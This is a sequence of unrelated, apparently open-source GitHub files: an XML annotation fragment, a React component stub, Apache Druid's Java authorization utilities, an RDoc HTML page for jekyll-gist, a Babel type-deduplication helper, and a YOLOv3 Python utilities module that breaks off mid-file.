<desc id="3771" len="12" off="3626">3439|MOD:DIST:1290|NUC:DIST:1292</desc>
<desc id="3772" len="7" off="3645">3440|NUC:DIST:1296</desc>
<desc id="3773" len="3" off="3675">3441|NUC:DIST:1307</desc>
<desc id="3774" len="28" off="3675">3442|MOD:DESC:1307~1309|NUC:DIST:1311~1313</desc>
<desc id="3775" len="2" off="3713">3443|NUC:DIST:1319</desc>
<desc id="3776" len="48" off="3746">3444|NUC:DESC:1331~1333|MOD:DIST:1335~1337~1339~1341~1343</desc>
<desc id="3777" len="21" off="3773">3445|MOD:DIST:1339|MOD:DIST:1341|NUC:DIST:1343</desc>
<desc id="3778" len="2" off="3800">3446|NUC:DIST:1349</desc>
<desc id="3779" len="19" off="3817">3447|MOD:DIST:1357|NUC:DIST:1359</desc>
<desc id="3780" len="8" off="3845">3448|NUC:DIST:1365</desc>
<desc id="3781" len="12" off="3855">3449|MOD:DIST:1370|MOD:DIST:1372|NUC:DIST:1374</desc>
<desc id="3782" len="5" off="3857">3450|NUC:DIST:1372</desc>
<desc id="3783" len="10" off="3883">3451|MOD:DIST:1380|NUC:DIST:1382</desc>
<desc id="3784" len="19" off="3934">3452|MOD:DIST:1404|MOD:DIST:1406~1408|NUC:DIST:1410</desc>
<desc id="3785" len="5" off="3954">3453|NUC:DIST:1412</desc>
<desc id="3786" len="24" off="3960">3454|NUC:DIST:1414|MOD:DIST:1416~1418~1420</desc>
<desc id="3787" len="9" off="4022">3455|MOD:DIST:1441|NUC:DIST:1443</desc>
<desc id="3788" len="10" off="4033">3456|MOD:DIST:1447|NUC:DIST:1449</desc>
<desc id="3789" len="16" off="4052">3457|MOD:DIST:1453|NUC:DIST:1455</desc>
<desc id="3790" len="58" off="4052">3458|MOD:DIST:1453~1455~1457|NUC:DIST:1459|MOD:DESC:1463~1465~1467~1469~1471~1473</desc>
<desc id="3791" len="57" off="4137">3459|NUC:DIST:1487|MOD:DIST:1489~1491~1493~1495~1497~1499~1501~1503</desc>
<desc id="3792" len="22" off="4172">3460|MOD:DIST:1499|MOD:DIST:1501|NUC:DIST:1503</desc>
<desc id="3793" len="6" off="4198">3461|NUC:DIST:1510</desc>
<desc id="3794" len="2" off="4210">3462|NUC:DIST:1514</desc>
<desc id="3795" len="4" off="4229">3463|NUC:DIST:1522</desc>
<desc id="3796" len="31" off="4255">3464|MOD:DIST:1532~1534|MOD:DIST:1536|NUC:DIST:1538</desc>
<desc id="3797" len="8" off="4302">3465|MOD:DIST:1546|NUC:DIST:1548</desc>
<desc id="3798" len="10" off="4317">3466|MOD:DIST:1555|NUC:DIST:1557</desc>
<desc id="3799" len="2" off="4349">3467|NUC:DIST:1565</desc>
<desc id="3800" len="8" off="4387">3468|MOD:DIST:1579|NUC:DIST:1581</desc>
<desc id="3801" len="9" off="4399">3469|MOD:DIST:1585|NUC:DIST:1587</desc>
<desc id="3802" len="8" off="4410">3470|MOD:DIST:1591|NUC:DIST:1593</desc>
<desc id="3803" len="32" off="4430">3471|MOD:DIST:1602|NUC:DIST:1604|MOD:DIST:1606~1608~1610</desc>
<desc id="3804" len="11" off="4451">3472|MOD:DIST:1608|NUC:DIST:1610</desc>
<desc id="3805" len="11" off="4464">3473|MOD:DIST:1614|NUC:DIST:1616</desc>
<desc id="3806" len="10" off="4482">3474|MOD:DIST:1620|NUC:DIST:1622</desc>
<desc id="3807" len="33" off="4521">3475|MOD:DIST:1634|MOD:DIST:1636~1638~1640~1642|NUC:DIST:1644</desc>
<desc id="3808" len="17" off="4523">3476|NUC:DIST:1636~1638~1640</desc>
<desc id="3809" len="23" off="4523">3477|MOD:DIST:1636~1638~1640|NUC:DIST:1642</desc>
<desc id="3810" len="5" off="4555">3478|NUC:DIST:1646</desc>
<desc id="3811" len="10" off="4562">3479|MOD:DIST:1651|NUC:DIST:1653</desc>
<desc id="3812" len="13" off="4578">3480|MOD:DIST:1657|NUC:DESC:1659~1661</desc>
<desc id="3813" len="25" off="4612">3481|MOD:DIST:1671|MOD:DIST:1673|NUC:DIST:1675</desc>
<desc id="3814" len="13" off="4639">3482|MOD:DIST:1680|NUC:DIST:1682</desc>
<desc id="3815" len="11" off="4661">3483|MOD:DIST:1686|NUC:DIST:1688</desc>
<desc id="3816" len="11" off="4674">3484|MOD:DIST:1692|NUC:DIST:1694</desc>
<desc id="3817" len="15" off="4697">3485|MOD:DIST:1702|NUC:DIST:1704</desc>
<desc id="3818" len="27" off="4746">3486|MOD:DIST:1718|NUC:DIST:1720|MOD:DIST:1722~1724~1726</desc>
<desc id="3819" len="9" off="4764">3487|MOD:DIST:1724|NUC:DIST:1726</desc>
<desc id="3820" len="29" off="4791">3488|NUC:DIST:1736|MOD:DIST:1738~1740~1742~1744~1746</desc>
<desc id="3821" len="10" off="4810">3489|MOD:DIST:1744|NUC:DIST:1746</desc>
<desc id="3822" len="38" off="4822">3490|NUC:DIST:1751|MOD:DIST:1753~1755~1757~1759~1761</desc>
<desc id="3823" len="27" off="4833">3491|MOD:DIST:1755|MOD:DIST:1757|MOD:DIST:1759|NUC:DIST:1761</desc>
<desc id="3824" len="12" off="4870">3492|MOD:DIST:1765|NUC:DIST:1767</desc>
<desc id="3825" len="163" off="4897">3493|MOD:DIST:1775|NUC:DIST:1777~1779|MOD:DESC:1781~1783~1785|MOD:DESC:1789~1791~1793~1795~1797~1799~1801~1803|MOD:DESC:1807~1809~1811~1813~1815~1817~1819~1821~1823~1825~1827~1829~1831~1833</desc>
<desc id="3826" len="5" off="4935">3494|NUC:DIST:1793</desc>
<desc id="3827" len="36" off="4935">3495|MOD:DIST:1793|NUC:DIST:1795~1797~1799~1801</desc>
<desc id="3828" len="10" off="5010">3496|MOD:DIST:1819|NUC:DIST:1821</desc>
<desc id="3829" len="15" off="5027">3497|MOD:DIST:1825|NUC:DIST:1827</desc>
<desc id="3830" len="14" off="5046">3498|MOD:DIST:1831|NUC:DIST:1833</desc>
<desc id="3831" len="11" off="5062">3499|MOD:DIST:1838|NUC:DIST:1840</desc>
<desc id="3832" len="7" off="5084">3500|NUC:DIST:1844</desc>
<desc id="3833" len="7" off="5093">3501|NUC:DIST:1848</desc>
<desc id="3834" len="97" off="5113">3502|MOD:DIST:1856|NUC:DIST:1858|MOD:DIST:1860~1862~1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3835" len="58" off="5152">3503|MOD:DIST:1864|NUC:DIST:1866|MOD:DESC:1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3836" len="7" off="5180">3504|NUC:DIST:1874</desc>
<desc id="3837" len="12" off="5198">3505|NUC:DIST:1880~1882</desc>
<desc id="3838" len="20" off="5212">3506|MOD:DIST:1887|MOD:DIST:1889|NUC:DIST:1891</desc>
<desc id="3839" len="7" off="5216">3507|NUC:DIST:1889</desc>
<desc id="3840" len="101" off="5250">3508|MOD:DIST:1899|NUC:DIST:1901~1903~1905~1907|MOD:DESC:1911~1913~1915~1917~1919~1921~1923~1925~1927</desc>
<desc id="3841" len="27" off="5309">3509|MOD:DIST:1917|MOD:DIST:1919|NUC:DIST:1921</desc>
<desc id="3842" len="11" off="5340">3510|MOD:DIST:1925|NUC:DIST:1927</desc>
</rep>
</story>
| {
"pile_set_name": "Github"
} |
import React from "react";
import { IReportItem, IReport } from '../src/ts/devtools/Report';
// REPLACE_IMPORTS
interface IHelpSwitcherProps {
report: IReport,
item: IReportItem;
}
export default class HelpSwitcher extends React.Component<IHelpSwitcherProps> {
render() {
return(<React.Fragment>
{/* REPLACE_FILES */}
</React.Fragment>);
}
} | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.server.security;
import com.google.common.base.Function;
import com.google.common.collect.Iterables;
import com.google.common.collect.Lists;
import org.apache.druid.java.util.common.ISE;
import javax.servlet.http.HttpServletRequest;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
/**
* Static utility functions for performing authorization checks.
*/
public class AuthorizationUtils
{
/**
* Check a resource-action using the authorization fields from the request.
*
* Otherwise, if the resource-actions is authorized, return ACCESS_OK.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param resourceAction A resource identifier and the action to be taken the resource.
* @param authorizerMapper The singleton AuthorizerMapper instance
*
* @return ACCESS_OK or the failed Access object returned by the Authorizer that checked the request.
*/
public static Access authorizeResourceAction(
final HttpServletRequest request,
final ResourceAction resourceAction,
final AuthorizerMapper authorizerMapper
)
{
return authorizeAllResourceActions(
request,
Collections.singletonList(resourceAction),
authorizerMapper
);
}
/**
* Returns the authentication information for a request.
*
* @param request http request
*
* @return authentication result
*
* @throws IllegalStateException if the request was not authenticated
*/
public static AuthenticationResult authenticationResultFromRequest(final HttpServletRequest request)
{
final AuthenticationResult authenticationResult = (AuthenticationResult) request.getAttribute(
AuthConfig.DRUID_AUTHENTICATION_RESULT
);
if (authenticationResult == null) {
throw new ISE("Null authentication result");
}
return authenticationResult;
}
/**
* Check a list of resource-actions to be performed by the identity represented by authenticationResult.
*
* If one of the resource-actions fails the authorization check, this method returns the failed
* Access object from the check.
*
* Otherwise, return ACCESS_OK if all resource-actions were successfully authorized.
*
* @param authenticationResult Authentication result representing identity of requester
* @param resourceActions An Iterable of resource-actions to authorize
*
* @return ACCESS_OK or the Access object from the first failed check
*/
public static Access authorizeAllResourceActions(
final AuthenticationResult authenticationResult,
final Iterable<ResourceAction> resourceActions,
final AuthorizerMapper authorizerMapper
)
{
final Authorizer authorizer = authorizerMapper.getAuthorizer(authenticationResult.getAuthorizerName());
if (authorizer == null) {
throw new ISE("No authorizer found with name: [%s].", authenticationResult.getAuthorizerName());
}
// this method returns on first failure, so only successful Access results are kept in the cache
final Set<ResourceAction> resultCache = new HashSet<>();
for (ResourceAction resourceAction : resourceActions) {
if (resultCache.contains(resourceAction)) {
continue;
}
final Access access = authorizer.authorize(
authenticationResult,
resourceAction.getResource(),
resourceAction.getAction()
);
if (!access.isAllowed()) {
return access;
} else {
resultCache.add(resourceAction);
}
}
return Access.OK;
}
/**
* Check a list of resource-actions to be performed as a result of an HTTP request.
*
* If one of the resource-actions fails the authorization check, this method returns the failed
* Access object from the check.
*
* Otherwise, return ACCESS_OK if all resource-actions were successfully authorized.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param resourceActions An Iterable of resource-actions to authorize
*
* @return ACCESS_OK or the Access object from the first failed check
*/
public static Access authorizeAllResourceActions(
final HttpServletRequest request,
final Iterable<ResourceAction> resourceActions,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return Access.OK;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
Access access = authorizeAllResourceActions(
authenticationResultFromRequest(request),
resourceActions,
authorizerMapper
);
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, access.isAllowed());
return access;
}
/**
* Filter a collection of resources by applying the resourceActionGenerator to each resource, return an iterable
* containing the filtered resources.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If every resource-action in the iterable is authorized, the resource will be added to the filtered resources.
*
* If there is an authorization failure for one of the resource-actions, the resource will not be
* added to the returned filtered resources..
*
* If the resourceActionGenerator returns null for a resource, that resource will not be added to the filtered
* resources.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param resources resources to be processed into resource-actions
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Iterable containing resources that were authorized
*/
public static <ResType> Iterable<ResType> filterAuthorizedResources(
final HttpServletRequest request,
final Iterable<ResType> resources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return resources;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
final AuthenticationResult authenticationResult = authenticationResultFromRequest(request);
final Iterable<ResType> filteredResources = filterAuthorizedResources(
authenticationResult,
resources,
resourceActionGenerator,
authorizerMapper
);
// We're filtering, so having access to none of the objects isn't an authorization failure (in terms of whether
// to send an error response or not.)
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, true);
return filteredResources;
}
/**
* Filter a collection of resources by applying the resourceActionGenerator to each resource, return an iterable
* containing the filtered resources.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If every resource-action in the iterable is authorized, the resource will be added to the filtered resources.
*
* If there is an authorization failure for one of the resource-actions, the resource will not be
* added to the returned filtered resources..
*
* If the resourceActionGenerator returns null for a resource, that resource will not be added to the filtered
* resources.
*
* @param authenticationResult Authentication result representing identity of requester
* @param resources resources to be processed into resource-actions
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Iterable containing resources that were authorized
*/
public static <ResType> Iterable<ResType> filterAuthorizedResources(
final AuthenticationResult authenticationResult,
final Iterable<ResType> resources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
final Authorizer authorizer = authorizerMapper.getAuthorizer(authenticationResult.getAuthorizerName());
if (authorizer == null) {
throw new ISE("No authorizer found with name: [%s].", authenticationResult.getAuthorizerName());
}
final Map<ResourceAction, Access> resultCache = new HashMap<>();
final Iterable<ResType> filteredResources = Iterables.filter(
resources,
resource -> {
final Iterable<ResourceAction> resourceActions = resourceActionGenerator.apply(resource);
if (resourceActions == null) {
return false;
}
for (ResourceAction resourceAction : resourceActions) {
Access access = resultCache.computeIfAbsent(
resourceAction,
ra -> authorizer.authorize(
authenticationResult,
ra.getResource(),
ra.getAction()
)
);
if (!access.isAllowed()) {
return false;
}
}
return true;
}
);
return filteredResources;
}
/**
* Given a map of resource lists, filter each resources list by applying the resource action generator to each
* item in each resource list.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If a resource list is null or has no authorized items after filtering, it will not be included in the returned
* map.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param unfilteredResources Map of resource lists to be filtered
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Map containing lists of resources that were authorized
*/
public static <KeyType, ResType> Map<KeyType, List<ResType>> filterAuthorizedResources(
final HttpServletRequest request,
final Map<KeyType, List<ResType>> unfilteredResources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return unfilteredResources;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
final AuthenticationResult authenticationResult = AuthorizationUtils.authenticationResultFromRequest(request);
Map<KeyType, List<ResType>> filteredResources = new HashMap<>();
for (Map.Entry<KeyType, List<ResType>> entry : unfilteredResources.entrySet()) {
if (entry.getValue() == null) {
continue;
}
final List<ResType> filteredList = Lists.newArrayList(
AuthorizationUtils.filterAuthorizedResources(
authenticationResult,
entry.getValue(),
resourceActionGenerator,
authorizerMapper
)
);
if (filteredList.size() > 0) {
filteredResources.put(
entry.getKey(),
filteredList
);
}
}
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, true);
return filteredResources;
}
/**
* Function for the common pattern of generating a resource-action for reading from a datasource, using the
* datasource name.
*/
public static final Function<String, ResourceAction> DATASOURCE_READ_RA_GENERATOR = input -> new ResourceAction(
new Resource(input, ResourceType.DATASOURCE),
Action.READ
);
/**
* Function for the common pattern of generating a resource-action for reading from a datasource, using the
* datasource name.
*/
public static final Function<String, ResourceAction> DATASOURCE_WRITE_RA_GENERATOR = input -> new ResourceAction(
new Resource(input, ResourceType.DATASOURCE),
Action.WRITE
);
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<title>module Liquid - jekyll-gist-1.3.5 Documentation</title>
<link type="text/css" media="screen" href="./rdoc.css" rel="stylesheet">
<script type="text/javascript">
var rdoc_rel_prefix = "./";
</script>
<script type="text/javascript" charset="utf-8" src="./js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/navigation.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/search_index.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/search.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/searcher.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/darkfish.js"></script>
<body id="top" class="module">
<nav id="metadata">
<nav id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./table_of_contents.html#classes">Classes</a>
<a href="./table_of_contents.html#methods">Methods</a>
</h3>
</nav>
<nav id="search-section" class="section project-section" class="initially-hidden">
<form action="#" method="get" accept-charset="utf-8">
<h3 class="section-header">
<input type="text" name="search" placeholder="Search" id="search-field"
title="Type to search, Up and Down to navigate, Enter to load">
</h3>
</form>
<ul id="search-results" class="initially-hidden"></ul>
</nav>
<div id="file-metadata">
<nav id="file-list-section" class="section">
<h3 class="section-header">Defined In</h3>
<ul>
<li>lib/jekyll-gist/gist_tag.rb
</ul>
</nav>
</div>
<div id="class-metadata">
</div>
<div id="project-metadata">
<nav id="classindex-section" class="section project-section">
<h3 class="section-header">Class and Module Index</h3>
<ul class="link-list">
<li><a href="./Jekyll.html">Jekyll</a>
<li><a href="./Jekyll/Gist.html">Jekyll::Gist</a>
<li><a href="./Jekyll/Gist/GistTag.html">Jekyll::Gist::GistTag</a>
<li><a href="./Liquid.html">Liquid</a>
<li><a href="./Net.html">Net</a>
</ul>
</nav>
</div>
</nav>
<div id="documentation">
<h1 class="module">module Liquid</h1>
<div id="description" class="description">
</div><!-- description -->
<section id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
</section><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<footer id="validator-badges">
<p><a href="http://validator.w3.org/check/referer">[Validate]</a>
<p>Generated by <a href="https://github.com/rdoc/rdoc">RDoc</a> 4.0.0.
<p>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish Rdoc Generator</a> 3.
</footer>
| {
"pile_set_name": "Github"
} |
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.default = removeTypeDuplicates;
var _generated = require("../../validators/generated");
function removeTypeDuplicates(nodes) {
const generics = {};
const bases = {};
const typeGroups = [];
const types = [];
for (let i = 0; i < nodes.length; i++) {
const node = nodes[i];
if (!node) continue;
if (types.indexOf(node) >= 0) {
continue;
}
if ((0, _generated.isAnyTypeAnnotation)(node)) {
return [node];
}
if ((0, _generated.isFlowBaseAnnotation)(node)) {
bases[node.type] = node;
continue;
}
if ((0, _generated.isUnionTypeAnnotation)(node)) {
if (typeGroups.indexOf(node.types) < 0) {
nodes = nodes.concat(node.types);
typeGroups.push(node.types);
}
continue;
}
if ((0, _generated.isGenericTypeAnnotation)(node)) {
const name = node.id.name;
if (generics[name]) {
let existing = generics[name];
if (existing.typeParameters) {
if (node.typeParameters) {
existing.typeParameters.params = removeTypeDuplicates(existing.typeParameters.params.concat(node.typeParameters.params));
}
} else {
existing = node.typeParameters;
}
} else {
generics[name] = node;
}
continue;
}
types.push(node);
}
for (const type of Object.keys(bases)) {
types.push(bases[type]);
}
for (const name of Object.keys(generics)) {
types.push(generics[name]);
}
return types;
} | {
"pile_set_name": "Github"
} |
import glob
import math
import os
import random
import shutil
import subprocess
from pathlib import Path
from sys import platform
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torchvision
from tqdm import tqdm
from . import torch_utils # , google_utils
# Set printoptions
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
matplotlib.rc('font', **{'size': 11})
# Prevent OpenCV from multithreading (to use PyTorch DataLoader)
cv2.setNumThreads(0)
def init_seeds(seed=0):
random.seed(seed)
np.random.seed(seed)
torch_utils.init_seeds(seed=seed)
def load_classes(path):
# Loads *.names file at 'path'
with open(path, 'r') as f:
names = f.read().split('\n')
return list(filter(None, names)) # filter removes empty strings (such as last line)
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurences per class
# Prepend gridpoint count (for uCE trianing)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class mAPs
n = len(labels)
class_counts = np.array([np.bincount(labels[i][:, 0].astype(np.int), minlength=nc) for i in range(n)])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco_class_weights(): # frequency of each class in coco train2014
n = [187437, 4955, 30920, 6033, 3838, 4332, 3160, 7051, 7677, 9167, 1316, 1372, 833, 6757, 7355, 3302, 3776, 4671,
6769, 5706, 3908, 903, 3686, 3596, 6200, 7920, 8779, 4505, 4272, 1862, 4698, 1962, 4403, 6659, 2402, 2689,
4012, 4175, 3411, 17048, 5637, 14553, 3923, 5539, 4289, 10084, 7018, 4314, 3099, 4638, 4939, 5543, 2038, 4004,
5053, 4578, 27292, 4113, 5931, 2905, 11174, 2873, 4036, 3415, 1517, 4122, 1980, 4464, 1190, 2302, 156, 3933,
1877, 17630, 4337, 4624, 1075, 3468, 135, 1380]
weights = 1 / torch.Tensor(n)
weights /= weights.sum()
# with open('data/coco.names', 'r') as f:
# for k, v in zip(f.read().splitlines(), n):
# print('%20s: %g' % (k, v))
return weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Transform box coordinates from [x1, y1, x2, y2] (where xy1=top-left, xy2=bottom-right) to [x, y, w, h]
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Transform box coordinates from [x, y, w, h] to [x1, y1, x2, y2] (where xy1=top-left, xy2=bottom-right)
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
# def xywh2xyxy(box):
# # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2]
# if isinstance(box, torch.Tensor):
# x, y, w, h = box.t()
# return torch.stack((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).t()
# else: # numpy
# x, y, w, h = box.T
# return np.stack((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).T
#
#
# def xyxy2xywh(box):
# # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h]
# if isinstance(box, torch.Tensor):
# x1, y1, x2, y2 = box.t()
# return torch.stack(((x1 + x2) / 2, (y1 + y2) / 2, x2 - x1, y2 - y1)).t()
# else: # numpy
# x1, y1, x2, y2 = box.T
# return np.stack(((x1 + x2) / 2, (y1 + y2) / 2, x2 - x1, y2 - y1)).T
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = max(img1_shape) / max(img0_shape) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, img_shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
def ap_per_class(tp, conf, pred_cls, target_cls):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.
# Arguments
tp: True positives (nparray, nx1 or nx10).
conf: Objectness value from 0-1 (nparray).
pred_cls: Predicted object classes (nparray).
target_cls: True object classes (nparray).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Sort by objectness
i = np.argsort(-conf)
tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]
# Find unique classes
unique_classes = np.unique(target_cls)
# Create Precision-Recall curve and compute AP for each class
pr_score = 0.1 # score to evaluate P and R https://github.com/ultralytics/yolov3/issues/898
s = [len(unique_classes), tp.shape[1]] # number class, number iou thresholds (i.e. 10 for mAP0.5...0.95)
ap, p, r = np.zeros(s), np.zeros(s), np.zeros(s)
for ci, c in enumerate(unique_classes):
i = pred_cls == c
n_gt = (target_cls == c).sum() # Number of ground truth objects
n_p = i.sum() # Number of predicted objects
if n_p == 0 or n_gt == 0:
continue
else:
# Accumulate FPs and TPs
fpc = (1 - tp[i]).cumsum(0)
tpc = tp[i].cumsum(0)
# Recall
recall = tpc / (n_gt + 1e-16) # recall curve
r[ci] = np.interp(-pr_score, -conf[i], recall[:, 0]) # r at pr_score, negative x, xp because xp decreases
# Precision
precision = tpc / (tpc + fpc) # precision curve
p[ci] = np.interp(-pr_score, -conf[i], precision[:, 0]) # p at pr_score
# AP from recall-precision curve
for j in range(tp.shape[1]):
ap[ci, j] = compute_ap(recall[:, j], precision[:, j])
# Plot
# fig, ax = plt.subplots(1, 1, figsize=(5, 5))
# ax.plot(recall, precision)
# ax.set_xlabel('Recall')
# ax.set_ylabel('Precision')
# ax.set_xlim(0, 1.01)
# ax.set_ylim(0, 1.01)
# fig.tight_layout()
# fig.savefig('PR_curve.png', dpi=300)
# Compute F1 score (harmonic mean of precision and recall)
f1 = 2 * p * r / (p + r + 1e-16)
return p, r, ap, f1, unique_classes.astype('int32')
def compute_ap(recall, precision):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rbgirshick/py-faster-rcnn.
# Arguments
recall: The recall curve (list).
precision: The precision curve (list).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Append sentinel values to beginning and end
mrec = np.concatenate(([0.], recall, [min(recall[-1] + 1E-3, 1.)]))
mpre = np.concatenate(([0.], precision, [0.]))
# Compute the precision envelope
mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))
# Integrate area under curve
method = 'interp' # methods: 'continuous', 'interp'
if method == 'interp':
x = np.linspace(0, 1, 101) # 101-point interp (COCO)
ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate
else: # 'continuous'
i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve
return ap
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False):
